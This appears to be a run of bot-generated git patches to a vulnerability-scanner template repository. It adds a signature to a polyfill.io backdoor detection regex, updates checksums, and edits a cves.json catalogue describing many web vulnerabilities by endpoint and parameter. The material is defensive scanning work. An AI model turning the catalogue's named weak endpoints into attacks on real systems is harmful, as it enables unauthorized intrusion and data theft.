a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -30,3 +30,4 @@ http: part: body regex: - "<script[^>]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" +# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d7ff3eec560f2ad5f26757083e2573f637ffebb Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:54:32 +0000 Subject: [PATCH 0683/1841] Auto Generated New Template Addition List [Thu Jun 27 15:54:31 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19510ef08a..02ac46b147 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml +http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml From 5a2ac6e113acd89c50ec7aa4447f2240f88c74a9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:54:37 +0000 Subject: [PATCH 0684/1841] Auto Generated Templates Checksum [Thu Jun 27 15:54:37 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 19edbc5081..43eab0da96 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3453,6 +3453,7 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd +http/cves/2024/CVE-2024-37881.yaml:3b6f81c95055fda7681a473c61abef1e44f501f4 http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -7721,7 +7722,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/backdoor/polyfill-backdoor.yaml:fe62beb69c44ac9f251a029254e5eb79973a422d +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:ef5b84434c7d83f9cc3e197c42f1c51b191faf8f http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -8795,7 +8796,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c10a211289173d951325ef89319b982058ed7627 +templates-checksum.txt:4bdc96e32f749b705227c9d5299e7b5a5160d4f9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c9568331904e4ff993ec0b0b639bf42df4c0ac8a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:54:40 +0000 Subject: [PATCH 0685/1841] Auto Generated cves.json [Thu Jun 27 15:54:40 UTC 2024] :robot: --- cves.json | 23 ++++++++++++----------- cves.json-checksum.txt | 2 +- 2 files changed, 13 insertions(+), 12 deletions(-) diff --git a/cves.json b/cves.json index f1fae6b2f8..67c97b2eb0 100644 --- a/cves.json +++ b/cves.json @@ -905,7 +905,6 @@ {"ID":"CVE-2020-2096","Info":{"Name":"Jenkins Gitlab Hook \u003c=1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-2096.yaml"} {"ID":"CVE-2020-20982","Info":{"Name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","Severity":"critical","Description":"shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2020/CVE-2020-20982.yaml"} {"ID":"CVE-2020-20988","Info":{"Name":"DomainMOD 4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the \"or Expiring Between\" parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-20988.yaml"} -{"ID":"CVE-2020-21012","Info":{"Name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-21012.yaml"} {"ID":"CVE-2020-2103","Info":{"Name":"Jenkins \u003c=2.218 - Information Disclosure","Severity":"medium","Description":"Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-2103.yaml"} {"ID":"CVE-2020-21224","Info":{"Name":"Inspur ClusterEngine 4.0 - Remote Code Execution","Severity":"critical","Description":"Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-21224.yaml"} {"ID":"CVE-2020-2140","Info":{"Name":"Jenkin Audit Trail \u003c=3.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-2140.yaml"} @@ -970,7 +969,6 @@ {"ID":"CVE-2020-28976","Info":{"Name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","Severity":"medium","Description":"WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28976.yaml"} {"ID":"CVE-2020-29164","Info":{"Name":"PacsOne Server \u003c7.1.1 - Cross-Site Scripting","Severity":"medium","Description":"PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-29164.yaml"} {"ID":"CVE-2020-29227","Info":{"Name":"Car Rental Management System 1.0 - Local File Inclusion","Severity":"critical","Description":"Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, leading to code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29227.yaml"} -{"ID":"CVE-2020-29284","Info":{"Name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29284.yaml"} {"ID":"CVE-2020-29395","Info":{"Name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-29395.yaml"} {"ID":"CVE-2020-29453","Info":{"Name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","Severity":"medium","Description":"The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-29453.yaml"} {"ID":"CVE-2020-29583","Info":{"Name":"ZyXel USG - Hardcoded Credentials","Severity":"critical","Description":"A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-29583.yaml"} @@ -1271,7 +1269,6 @@ {"ID":"CVE-2021-28164","Info":{"Name":"Eclipse Jetty - Information Disclosure","Severity":"medium","Description":"Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-28164.yaml"} {"ID":"CVE-2021-28169","Info":{"Name":"Eclipse Jetty ConcatServlet - Information Disclosure","Severity":"medium","Description":"Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-28169.yaml"} {"ID":"CVE-2021-28377","Info":{"Name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","Severity":"medium","Description":"Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-28377.yaml"} -{"ID":"CVE-2021-28419","Info":{"Name":"SEO Panel 4.8.0 - Blind SQL Injection","Severity":"high","Description":"SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-28419.yaml"} {"ID":"CVE-2021-28854","Info":{"Name":"VICIdial Sensitive Information Disclosure","Severity":"high","Description":"VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-28854.yaml"} {"ID":"CVE-2021-28918","Info":{"Name":"Netmask NPM Package - Server-Side Request Forgery","Severity":"critical","Description":"Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-28918.yaml"} {"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"} @@ -1408,7 +1405,6 @@ {"ID":"CVE-2021-40868","Info":{"Name":"Cloudron 6.2 Cross-Site Scripting","Severity":"medium","Description":"In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40868.yaml"} {"ID":"CVE-2021-40870","Info":{"Name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","Severity":"critical","Description":"Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40870.yaml"} {"ID":"CVE-2021-40875","Info":{"Name":"Gurock TestRail Application files.md5 Exposure","Severity":"high","Description":"Improper access control in Gurock TestRail versions \u003c 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40875.yaml"} -{"ID":"CVE-2021-40908","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40908.yaml"} {"ID":"CVE-2021-40960","Info":{"Name":"Galera WebTemplate 1.0 Directory Traversal","Severity":"critical","Description":"Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40960.yaml"} {"ID":"CVE-2021-40968","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40968.yaml"} {"ID":"CVE-2021-40969","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40969.yaml"} @@ -1472,6 +1468,7 @@ {"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"} {"ID":"CVE-2021-44152","Info":{"Name":"Reprise License Manager 14.2 - Authentication Bypass","Severity":"critical","Description":"Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44152.yaml"} {"ID":"CVE-2021-44228","Info":{"Name":"Apache Log4j2 Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-44228.yaml"} +{"ID":"CVE-2021-4436","Info":{"Name":"3DPrint Lite \u003c 1.9.1.5 - Arbitrary File Upload","Severity":"critical","Description":"The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-4436.yaml"} {"ID":"CVE-2021-44427","Info":{"Name":"Rosario Student Information System Unauthenticated SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44427.yaml"} {"ID":"CVE-2021-44451","Info":{"Name":"Apache Superset \u003c=1.3.2 - Default Login","Severity":"medium","Description":"Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-44451.yaml"} {"ID":"CVE-2021-44515","Info":{"Name":"Zoho ManageEngine Desktop Central - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44515.yaml"} @@ -1734,8 +1731,6 @@ {"ID":"CVE-2022-27927","Info":{"Name":"Microfinance Management System 1.0 - SQL Injection","Severity":"critical","Description":"Microfinance Management System 1.0 is susceptible to SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27927.yaml"} {"ID":"CVE-2022-27984","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"critical","Description":"CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27984.yaml"} {"ID":"CVE-2022-27985","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"critical","Description":"CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-27985.yaml"} -{"ID":"CVE-2022-28022","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28022.yaml"} -{"ID":"CVE-2022-28023","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28023.yaml"} {"ID":"CVE-2022-28032","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-28032.yaml"} {"ID":"CVE-2022-28079","Info":{"Name":"College Management System 1.0 - SQL Injection","Severity":"high","Description":"College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-28079.yaml"} {"ID":"CVE-2022-28080","Info":{"Name":"Royal Event - SQL Injection","Severity":"high","Description":"Royal Event is vulnerable to a SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-28080.yaml"} @@ -1796,10 +1791,6 @@ {"ID":"CVE-2022-31976","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31976.yaml"} {"ID":"CVE-2022-31977","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31977.yaml"} {"ID":"CVE-2022-31978","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31978.yaml"} -{"ID":"CVE-2022-31980","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31980.yaml"} -{"ID":"CVE-2022-31981","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31981.yaml"} -{"ID":"CVE-2022-31982","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31982.yaml"} -{"ID":"CVE-2022-31983","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31983.yaml"} {"ID":"CVE-2022-31984","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31984.yaml"} {"ID":"CVE-2022-32007","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit\u0026id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-32007.yaml"} {"ID":"CVE-2022-32015","Info":{"Name":"Complete Online Job Search System 1.0 - SQL Injection","Severity":"high","Description":"Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category\u0026search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-32015.yaml"} @@ -2117,7 +2108,6 @@ {"ID":"CVE-2023-2948","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2948.yaml"} {"ID":"CVE-2023-29489","Info":{"Name":"cPanel \u003c 11.109.9999.116 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} {"ID":"CVE-2023-2949","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2949.yaml"} -{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} {"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} {"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"} @@ -2257,6 +2247,7 @@ {"ID":"CVE-2023-41266","Info":{"Name":"Qlik Sense Enterprise - Path Traversal","Severity":"medium","Description":"A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-41266.yaml"} {"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"} {"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} +{"ID":"CVE-2023-41599","Info":{"Name":"JFinalCMS v5.0.0 - Directory Traversal","Severity":"medium","Description":"An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41599.yaml"} {"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} 